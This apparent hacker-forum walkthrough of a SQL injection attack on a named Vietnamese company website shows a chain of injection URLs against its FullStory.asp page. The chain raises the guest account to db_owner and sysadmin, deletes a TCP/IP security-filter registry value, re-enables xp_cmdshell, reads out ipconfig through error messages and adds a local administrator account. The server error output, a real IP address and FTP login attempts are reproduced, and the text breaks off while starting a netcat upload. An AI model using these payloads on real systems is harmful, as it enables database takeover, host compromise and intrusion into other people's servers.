Microsoft OLE DB Provider for ODBC Drivers error 80040e07
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value nhaxinh to a column of data type int.
/Including/general.asp, line 840

 


OPENING REMOTE LINK (http://msdn.microsoft.com/library/default.asp?url=/library/en-us/tsqlref/ts_oa-oz_78z8.asp)
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset(sqloledb,;;,)--

Code:

Microsoft OLE DB Provider for ODBC Drivers error 80040e14
[Microsoft][ODBC SQL Server Driver][SQL Server] Ad hoc access to OLE DB provider sqloledb has been denied. You must access this provider through a linked server.
/Including/general.asp, line 840

 


GUEST = DB_OWNER :DDD
http://www.XXXX.com/FullStory.asp?id=1;exec sp_executesql Ncreate view dbo.test as select * from master.dbo.sysusers exec sp_msdropretry xx update sysusers set sid=0x01 where name=dbo,xx exec sp_msdropretry xx update dbo.test set sid=0x01,roles=0x01 where name=guest,xx exec sp_executesql Ndrop view dbo.test--

Code:

   No result expected, normal page loading
   Enable us to do sum nice stuff like xp_regwrite e xp_cmdshell

 


ADDIN TO "BUILTINADMINISTRATORS"
http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec sp_executesql Ncreate view dbo.test as select * from master.dbo.sysxlogins exec sp_msdropretry xx update sysusers set sid=0x01 where name=dbo,xx exec sp_msdropretry xx update dbo.test set xstatus=18 where name=BUILTINADMINISTRATORS,xx exec sp_executesql Ndrop view dbo.test--

and then

http://www.xxxx.com/FullStory.asp?id=1;exec master..sp_addsrvrolemember nhaxinh,sysadmin --

ENABLE OPENROWSET/OLEDB
http://www.xxxx.com/FullStory.asp?id=1;select * from openrowset(sqloledb,;;,)--

Code:

Microsoft OLE DB Provider for ODBC Drivers error 80004005
[Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user SYSTEM.
/Including/general.asp, line 840

 

http://www.xxxx.com/FullStory.asp?id=1;exec master..xp_regdeletevalue HKEY_LOCAL_MACHINE,SYSTEMCurrentControlSetServicesTcpipParameters,EnableSecurityFilters

 

ENABLE MASTER..XP_CMDSHELL & "ALLOW UPDATES"
http://www.xxxx.com/FullStory.asp?id=1;select * from openrowset(sqloledb, server=UNESCO;uid=BUILTINAdministrators;pwd=, set fmtonly off exec master..sp_addextendedproc xp_cmd,xpsql70.dll exec sp_configure allow updates, 1 reconfigure with override)

!!PAY ATTETION TO THE SERVER= PARAMETER

Code:

Microsoft OLE DB Provider for ODBC Drivers error 80040e14
[Microsoft][ODBC SQL Server Driver][SQL Server]Could not process object set fmtonly off master..sp_addextendedproc xp_cmd xpsql70.dll exec sp_configure allow updates, 1 reconfigure with override. The OLE DB provider sqloledb indicates that the object has no columns.
/Including/general.asp, line 840

 

if dun work try:
http://www.xxxx.com/FullStory.asp?id=1;select * from openrowset(sqloledb, server=UNESCO;uid=BUILTINAdministrators;pwd=, set fmtonly off select 1 exec master..sp_addextendedproc xp_cmd,xpsql70.dll exec sp_configure allow updates, 1 reconfigure with override)--

 

NOW SCRIPT KIDDIES


http://www.xxxx.com/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell ipconfig--
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select top 1 b from t where b like %25IP Address%25))-- (%25 == “%”)

Code:


Microsoft OLE DB Provider for ODBC Drivers error 80040e07
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value IP Address. . . . . . . . . . . . : 203.162.7.70 to a column of data type int.
/Including/general.asp, line 840


C:> ping 203.162.7.70
Pinging 203.162.7.70 with 32 bytes of data:
Reply from 203.162.7.70: bytes=32 time=232ms TTL=118
C:> ftp 203.162.7.70
Connected to 203.162.7.70.
220 unesco Microsoft FTP Service (Version 5.0).
User (203.162.7.70:(none)):
203.162.7.70 == panvietnam.com

 


http://www.xxxx.com/FullStory.asp?id=1;select * from openrowset(sqloledb, server=UNESCO;uid=BUILTINAdministrators;pwd=, set fmtonly off select 1 exec xp_cmdshell "net user a /add %26 net localgroup administrators a /add")-- (%26 == "&")

Code:

C:> ftp 203.162.7.70
Connected to 203.162.7.70.
220 unesco Microsoft FTP Service
(Version 5.0).
User (203.162.7.70:(none)): a
331 Password required for a.
Password:
530 User a cannot log in.
Login failed.
ftp> bye

 


UPLOAD NETCAT L&Ecirc;N
http://www.xxxx.com/FullStory.asp?id=1;select * from openrowset(sqloledb, server=UNESCO;uid=BUIL